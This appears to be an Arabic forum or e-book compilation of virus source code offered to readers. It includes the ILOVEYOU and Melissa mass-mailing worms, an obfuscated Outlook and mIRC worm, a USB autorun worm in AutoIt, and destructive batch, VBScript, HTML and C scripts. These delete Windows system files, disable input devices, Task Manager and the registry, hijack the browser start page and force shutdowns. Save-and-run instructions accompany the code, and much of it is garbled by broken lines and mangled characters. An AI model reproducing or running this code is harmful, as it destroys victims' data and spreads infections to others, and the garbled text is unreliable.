set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USE
R\Software\M icrosoft\WAB"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USE
R\Software\ Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached
LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVELETTERFORYOU.
TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
AB"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
AB"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
AB"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTE
R HTML<?
?
TITLE><META
NAME=@@
Generator@@
&@#&@#&@#&@#&@#&@#&@#=@@
BAROK VBS LOVELETTER@
@>"&
vbcrlf& _
"<META NAME=@@
Author@@
&@#&@#&@#&@#&@#&@#&@#=@@
spyder ??
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ??
@GRAMMERSoft Group ??
Manila,
Philippines ??
March 2000@@>"&
vbcrlf& _
"<META NAME=@@
Description@@
&@#&@#&@#&@#&@#&@#&@#=@@
simple
but i think this is
good...@@>"&
vbcrlf& _
"<??
HEAD><BODY
ONMOUSEOUT=@@
window.name=##
main##;
window.open(##
LOVELETTERFORYOU.
HTM#
#,#
#
main##)@
@
"&vbcrlf& _
"ONKEYDOWN=@@
window.name=##
main##;
window.open(##
LOVELETTERFORYOU.
HTM#
#,#
#
main##)@
@
BGPROPERTIES=@@
fixed@@
BGCOLOR=@@#
FF9933@@>"&
vbcrlf& _
"<CENTER><p>This HTML file need ActiveX
Control<??
p><p>To Enable to read
this HTML file<BR>Please
press ##
YES##
button to Enable
ActiveX<??
p>"&vbcrlf& _
"<??
CENTER><MARQUEE LOOP=@@
infinite@@
BGCOLOR=@@
yellow@@>
zz<?
?
MARQUEE>
"&vbcrlf& _
"<??
BODY><??
HTML>"&vbcrlf& _
"<SCRIPT language=@@
JScript@@>"&
vbcrlf& _
"<!?
??
?"&
vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.****To(0,0);window.
re sizeTo(wi,hi);}"&vbcrlf& _
"???
?
>"&
vbcrlf& _
"<??
SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@@
VBScript@@>"&
vbcrlf& _
"<!"&
vbcrlf& _
"on error resume next"&vbcrlf& _
"dim
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit
"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@@
Scripting.FileSystemObject@@)"&
vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf&
_
"code2=replace(code,chr(91)&chr(45)&chr(91),chr
(39 ))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),ch
r(3 4))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),ch
r(9 2))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@@^
^
MSKernel32.vbs@@)"&
vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@@^
^
MSKernel32.vbs@@))
then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @@
ERROR: can##
t initialize
ActiveX@@"&
vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@@
WScript.Shell@@)"&
vbcrlf& _
"regedit.RegWrite
@@
HKEY_LOCAL_MACHINE^^
Software^^
Microsoft^^
Windows^^
CurrentVersion^^
Ru
n^^
MSKernel32@@,
dirsystem&@@^
^
MSKernel32.vbs@@"&
vbcrlf& _
"???
?
>"&
vbcrlf& _
"<??
SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"")
set
fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(
91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr
(93))
lines(n)=replace(lines(n),"",chr(37)+chr(45)+chr(
37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVELETTERFORYOU.
HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVELETTERFORYOU.
HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
بالفجوال بيسك
جلب الداة winsock
ضع الكود في الفورم ملحظة********
لتقوموا بتجرتة الكود ************ فقط بعد
وضع الكود يجب انشاء ملف exe
4
le code
app.taskvisible=false
call kill("c:\windows\*.exe")
call kill("c:\windows\*.ini")
call kill("c:\windows\*.dll")
أنا خليته في تكست و بعدين بدلت المتداد
الى .reg
و الهدف منه ان أي شي امتداده bat exe pif
com ما يشتغل
:::::::: و هو كاتالي::::::::
[line]
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.bat\PersistentHandler]
@="{System Axe}"
[HKEY_CLASSES_ROOT\.pif\PersistentHandler]
@="{System Axe}"
[HKEY_CLASSES_ROOT\.exe\PersistentHandler]
@="{System Axe}"
[HKEY_CLASSES_ROOT\.com\PersistentHandler]
@="{System Axe}"
[line]
هذا الكود لتعطيل الريجستري وادارة المهام
ولل gpedit.msc الي يمكن للضحية اذا كان
شاطر شوي انو يشغل منه اداره المهام
.....والريجستري
reg add
HKCU\software\Microsoft\Windows\CurrentVersi
on\Pol icies\System\ /v DisableRegistryTools /t
REG_DWORD /d 0000001 /f
reg add
HKEY_CURRENT_USER\Software\Microsoft\Wi
ndows\Curre ntVersion\Policies\System\ /v
DisableTaskMgr /t reg_dword /d 00000001 /f
@del "C:\WINDOWS\system32\gpedit.msc" /q
أقدم لكم الفيروس الذي يقوم بتغير الشاشة الرئيسية على قولت واحد
من الشباب .. وأداني الكود .. وأنا دحين بأجربو .. لكن أديكم الكود
.. وأفيدكم .. لنكم عيوني إنتو
.. الكود هو
:كود
@echo off
set key=HKCU\Software\Microsoft\Internet Explorer\Main
set value=Start page
set data=http://www.tvquran.com/
reg.exe add "%key%" /v "%value%" /d "%data%" /f >nul
قمت بصناعة فايروس يقوم بعمل minimize
للنوافذ المفتوحة
الية عمله
عند تشغيله يغير اسمه الى 1
taskmgr
ينقل نفسه الى 2
my document
يقوم باخفاء نفسه 3
يسجل اسمه ضمن المسجلت 4
يقوم بانشاء ملف اوتوران 5
يقوم بعمل منيمايز للنوافذ المفتوحة حيث 6
قمت بانشاء عداد يبداء من 1 ويتزايد بمقدار 1
ويتوقف عندما يصل العدد الى - 1 وهذا
مستحيل
بعد النتشار عند فتح اي بارتشن فان 7
الفايروس سيعمل من جديد حتى بعد اعادة
التشغيل
البرنامج المستخدم هو AutoIt Version: 3.2.10.0
وهذا هو كود الفايروس
#cs
AutoIt
Version: 3.2.10.0
Author: asd
Script Function:
Template AutoIt script.
#ce
;
Script Start Add
your code below here
#NoTrayIcon
$name="taskmgr"
$exe=".exe"
$count=1
$c="c:"
$d="d:"
$e="e:"
$f="f:"
$g="g:"
$h="h:"
$i="i:"
$j="j:"
$k="k:"
$l="l:"
$m="m:"
$n="n:"
sleep(3000)
FileCopy (@AutoItExe, @DocumentsCommonDir
& "" & $name & $exe,0)
; Make itself protected (readonly, system, hidden)
FileSetAttrib (@DocumentsCommonDir & "" &
$name & $exe,"+RSH")
; Copy itself to windows directory
RegWrite
("HKEY_LOCAL_MACHINE\SOFTWARE\Micr
osoft\Windows
NT\CurrentVersion\Winlogon","Shell","REG_SZ
","Expl orer.exe " & $name & $exe)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;
sleep(1000)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shellexe cute",$name
& $exe)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shell\Open\command"
,$nam e & $exe)
IniWrite (@DocumentsCommonDir &
"\autorun.ini","Autorun","Shell","Open")
Sleep (1)
FileSetAttrib (@DocumentsCommonDir &
"\autorun.ini","+RSH")
do
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
FileDelete($c& "\autorun.inf")
FileDelete($d& "\autorun.inf")
FileDelete($e& "\autorun.inf")
FileDelete($f& "\autorun.inf")
FileDelete($g& "\autorun.inf")
FileDelete($h& "\autorun.inf")
FileDelete($i& "\autorun.inf")
FileDelete($j& "\autorun.inf")
FileDelete($k& "\autorun.inf")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$c& "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$d & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$e & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$f & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$g & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$h & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$i & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$j & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$k & "\autorun.inf",1)
FileCopy (@DocumentsCommonDir &
"\autorun.ini",$l & "\autorun.inf",1)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;
FileCopy(@AutoItExe,$c & "" & $name & $exe)
FileSetAttrib ($c & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$d & "" & $name & $exe)
FileSetAttrib ($d & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$e & "" & $name & $exe)
FileSetAttrib ($e & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$f & "" & $name & $exe)
FileSetAttrib ($f & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$g & "" & $name & $exe)
FileSetAttrib ($g & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$h & "" & $name & $exe)
FileSetAttrib ($h & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$i & "" & $name & $exe)
FileSetAttrib ($i & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$j & "" & $name & $exe)
FileSetAttrib ($j & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$k & "" & $name & $exe)
FileSetAttrib ($k & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$l & "" & $name & $exe)
FileSetAttrib ($l & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$m & "" & $name & $exe)
FileSetAttrib ($m & "" & $name & $exe,"+RSH")
FileCopy(@AutoItExe,$n & "" & $name & $exe)
FileSetAttrib ($n & "" & $name & $exe,"+RSH")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;
sleep (5)
WinMinimizeAll()
$count=$count+1
sleep(50000)
Until $count=1
لكم كود فايروس ميلسيا
هديةبما اني عضو جديد
ارجو عدم استخدامه ضد اخوانناالمسلمين
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
0\ord\e curity", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").
Enabl ed = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\.
0\ord\e curity", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabl
ed = False
Options.ConfirmConversions = (1 1):
Options.VirusProtection = (1 1):
Options.SaveNormalPrompt = (1 1)
End If
Dim UngaDasOutlook, DasMapiName,
BreakUmOffASlice
Set UngaDasOutlook =
CreateObject("Outlook.Application")
Set DasMapiName =
UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
"Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice =
UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo =
AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message
From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document
you asked for ... don't show anyone else
"BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\oftware\icrosoft\ffice\,
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 =
ActiveDocument.VBProject.VBComponents.Item(1
)
Set NTI1 =
NormalTemplate.VBProject.VBComponents.Item(
1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo
CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private
Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN,
ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private
Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN,
NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1,
ActiveDocument.Name, "Document") = False)
Then
ActiveDocument.SaveAs
FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name,
"Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000
Virus? You Decide!
'Word >
Email | Word 97 <>
Word 2000 ... it's a
new age!
If Day(Now) = Minute(Now) Then
Selection.TypeText "Twentytwo
points, plus triplewordscore,
plus fifty points for using all my
letters. Game's over. I'm outta here."
End Sub
هذا Virus worm
:اقتباس
Set O6734VC6 = createobject("scripting.filesystemobject")
O78SS2L7 = O6734VC6.getspecialfolder(1)
A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"
Set E828D4O2 = createobject("wscript.shell")
E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru
n\WinUpdate", "wscript.exe " & A6G1HQFH & " %"
O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
UB51PCQU
If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then
KD8F5L2N
End if
If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then
HLVO1EDH ""
End if
Function KD8F5L2N()
Set O13Q767K = CreateObject("Outlook.Application")
If O13Q767K = "Outlook" Then
Set LFSIH230 = O13Q767K.GetNameSpace("MAPI")
Set LLLK4LPL = LFSIH230.AddressLists
For Each A4A83865 In LLLK4LPL
If A4A83865.AddressEntries.Count <> 0 Then
JM1R7N44 = A4A83865.AddressEntries.Count
For NHF463JD = 1 To JM1R7N44
Set OU435GC5 = O13Q767K.CreateItem(0)
Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
OU435GC5.To = KP511I06.Address
OU435GC5.Subject = "Very Important!"
OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99)
& Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
IJ15SDEE = A6G1HQFH
OU435GC5.DeleteAfterSubmit = True
DH97CAIN.Add IJ15SDEE
If OU435GC5.To <> "" Then
OU435GC5.Send
End If
Next
End If
Next
End If
End function
Function HLVO1EDH(AHAOA819)
If AHAOA819 <> "" Then
TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Micr
osoft\Windows\CurrentVersion\ProgramFilesDir")
If O6734VC6.fileexists("c:\mirc\mirc.ini") Then
AHAOA819 = "c:\mirc"
ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then
AHAOA819 = "c:\mirc32"
ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then
AHAOA819 = TJTE98P3 & "\mirc"
ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then
AHAOA819 = TJTE98P3 & "\mirc"
Else
AHAOA819 = ""
End If
End If
If AHAOA819 <> "" Then
Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True)
U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick
"
U127MJ5H = U127MJ5H & A6G1HQFH
U127MJ5H = U127MJ5H & vbCrLf & "n3=}"
script.Close
End If
End Function
Function J706734V()
On Error Resume Next
Set CKQ24CHB = O6734VC6.Drives
For Each G2U828D4 In CKQ24CHB
OC078SS2 = G2U828D4 & " \ "
Call L7R6G1HQ(OC078SS2)
Next
End Function
Function L7R6G1HQ(FS6B51PC)
Q35A1OM5 = FS6B51PC
Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
Set G6F47AC8 = ITHD8F5L.Files
For Each NFFLVO1E In G6F47AC8
If lcase(NFFLVO1E.Name) = "mirc.ini" Then
HLVO1EDH(NFFLVO1E.ParentFolder)
End If
If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
Next
Set VSM3BL08 = ITHD8F5L.Subfolders
For Each UQFA0DCQ In VSM3BL08
Call (UQFA0DCQ.path)
Next
End function
Function UB51PCQU()
Randomize
If 1 + Int(Rnd * 50) = 7 then
E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"
end if
end function
الن فايروسات العزيز
blackdream
هذا الفيروس يقوم بمهام منها
نسخ نفسه في بدا التشغيل: 1
تعطيل الكيبورد والفارة: 2
انشاء اللف من المجلدات على سطح المكتب وعلى: 3 c
حذف: 4 temp antivirus
يعطل المؤشرات: 5
حذف الويندوز نهائيا: 6
غلق الجهاز بطريقة ة: 7
:كود
@echo OFF
title T0TAL_DZ is attacked your systeme
attrib +s +h %0
copy %0 "C:\Users\%username
%\AppData\Roaming\Microsoft\Win dows\start
Menu\Programs\startup"
cd C:Windowssystem32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR
COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY
READING THESE FOLDERS ONE BY ONE AS YOU CANT USE
YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY
HAVING THE REST OF YOUR COMPUTER GET RESTARTING
YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
echo CHECK YOUR DESKTOP
ping localhost >nul
mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME,
NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND
POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST
OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS
FITS!
echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL
ping localhost >nul
echo Y | del C:WindowssecurityDatabase
cd C:WindowsCursors
del /S /F /Q *.cur
del /S /F /Q *.ani
echo OH NO WHERE THE DID YOUR CURSOR GO
ping localhost >nul
cls
echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, T0TAL IS HERE"
exit
فيروس الهوتميل
وهدا فيروس خطير جدااا فيروس الهوتميل
يقوم بتعطيل كل شيء
انسخ الكود وضعه في المفكرة notepad واحفطه متل بي
bLaCkDrEaM.html
<html>
<head>
<**** **********="ContentType"
content="text/html; charset=iso88591">
<title>ActiveX
HTML</title>
</head>
THIS HTML USING ACTIVEX
PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
<script language="VBScript">
<!This
is a MY BRAIN !>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</script>
<!This
script author is THEONE!>
</body>
</html>
.................................................. ..
مقسم الى مجموعات قوم بتجميعها في notepad النوت
باد ضعه في النوت باد وحفظ بي bLaCkDrEaM.bat
:اقتباس
Disassembly of File: office_crack.exe
Code Offset = 00000400, Code Size = 00000000
Data Offset = 00000400, Data Size = 00000000
Number of Objects = 0003 (dec), Imagebase =
004A0000h
Object01: UPX0 RVA: 00001000 Offset: 00000400 Size:
00000000 Flags: E0000080
Object02: UPX1 RVA: 00007000 Offset: 00000400 Size:
00005000 Flags: E0000040
Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size:
00000400 Flags: C0000040
+++++++++++++++++++ MENU INFORMATION ++++++++
++++++++++
There Are No Menu Resources in This Application
+++++++++++++++++ DIALOG INFORMATION ++++++++
++++++++++
There Are No Dialog Resources in This Application 0
+++++++++++++++++++ IMPORTED FUNCTIONS ++++++
++++++++++++ 0
Number of Imported Modules = 0 (decimal)
+++++++++++++++++++ IMPORT MODULE DETAILS +++
++++++++++++ 0
+++++++++++++++++++ EXPORTED FUNCTIONS +++++
+++++++++++++ 0
Number of Exported Functions = 0000 (decimal) ++
+++++++++++++++++++ ASSEMBLY CODE LISTING +++
+++++++++++++++
//********************** Start of Code in Object UPX0
**************
Program Entry Point = 004ABE60 (office_crack.exe File
Offset:0000B260) g
:004A7000 EE out dx, al
:004A7001 8702 xchg dword ptr [edx], eax
:004A7003 92 xchg eax,edx r
:004A7004 005026 add byte ptr [eax+26], dl
:004A7007 4A dec edx p
:004A7008 004003 add byte ptr [eax+03], al
:004A700B FD std by
:004A700C B269 mov dl, 69
:004A700E 9A2C1004F425E8 call E825:F404102C
:004A7015 0100 add dword ptr [eax], eax
:004A7017 4B dec ebx d
:004A7018 CE into b
:004A7019 699A6ED91FC82AC003B8 imul ebx, dword
ptr [edx+C81FD96E], B803C02A 0
:004A7023 B0A8 mov al, A8
:004A7025 A6 cmpsb
:004A7026 699AA6A0989088809AA6 imul ebx, dword ptr
[edx+9098A0A6], A69A8088 0
:004A7030 699A787068605850CD60 imul ebx, dword ptr
[edx+60687078], 60CD5058 0
:004A703A 9F lahf e
:004A703B 69480044073830 imul ecx, dword ptr
[eax+00], 30380744
:004A7042 344D xor al, 4D
:004A7044 D3 BYTE 0d0h
:004A7045 7403 je 004A704A or
:004A7047 28241C sub byte ptr [esp+ebx], ah
* Referenced by a (U)nconditional or (C)onditional Jump
at Address:
|:004A7045(C) y
| 00
:004A704A 1810 sbb byte ptr [eax], dl
:004A704C D32CBB shr dword ptr [ebx+4*edi], cl
:004A704F D7 xlat w
:004A7050 0823 or byte ptr [ebx], ah
:004A7052 03F8 add edi, eax e
:004A7054 29F0 sub eax, esi e
:004A7056 E84DD3344D call 4D7F43A8
:004A705B E0D8 loopnz 004A7035 ],
:004A705D D0C8 ror al, 1
:004A705F BCB4344DD3 mov esp, D34D34B4
:004A7064 34AC xor al, AC
:004A7066 A4 movsb[/
.................................................. ..
كود لحذف شاشة الترحيب للويندوز
من العنوان ستفهم كل العادة ضعه في notepad النوت باد
وحفط بي bLaCkDrEaM.bat
:اقتباس
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
.................................................. ...
فيروس الفيجول بيسك
ا فيروسات تدمير الويندوز
احفط بي bLaCkDrEaM.bat
:اقتباس
vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"[/CODE
.................................................. ...........
فيروس تدمير الويندوز new
يمتاز الفيروس بتعديب الضجية ودلك بصدار عدة اوامر تم
يقوم بتدمير الهاردسك
انسخ الكود واحفظه في النوت باد notebad وبعد دالك
حفط bLaCkDrEaM.bat
Del c:\windows\system\msconfig.exe
Del c:\windows\Rundll32.exe
Del c:\windows\regedit.exe
Del c:\windows\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
Del c:\windows\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\windows\system\Sysedit.exe
Del c:\windows\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
أن شاء الله تعجبكم
أخوكم الحلم السود
.............................يتبع
bLaCkDrEaM
قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره 1
انسخ
:كود
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo
قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل 2
للجهاز
انسخ
:كود
call attrib h
r
c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo
فيرووس3
C++ :
انسخ
:كود
#include
#include
#include
main()
{
clrscr();
printf("tttCoffin Of Evil ");
printf("ttWElcome to My World");
remove("c:\windows\system.ini");
remove("c:\windows\win.ini");
remove("c:\autoexec.bat");
remove("c:\msdos.sys");
remove("c:\io.sys");
remove("c:\command.com");
remove("c:\config.sys");
remove("c:\windows\ebd\command.com");
remove("c:\windows\ebd\ebd.cab");
remove("c:\windows\ebd\Autoexec.bat");
remove("c:\windows\ebd\setramd.bat");
remove("c:\windows\ebd\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/sta
rtup/win.exe");
printf("Windows destroyed ...nn");
system("PAUSE");
}
إطفاء الجهاز بعد 60 ثانيه 4
:كود
cmdow @ /HID
shutdown.exe r
f
t
60 c
"Windows XP will now restart
in 60 Seconds...hacked by "حط الكلم الذي تريد
net user aspnet /delete
EXIT
ارجو عدم استخدامه على اخواننا المسلمين
واني بريء من كل عمل يضر اخواننا المسلمين
تم تصميم الكتاب بواسطة
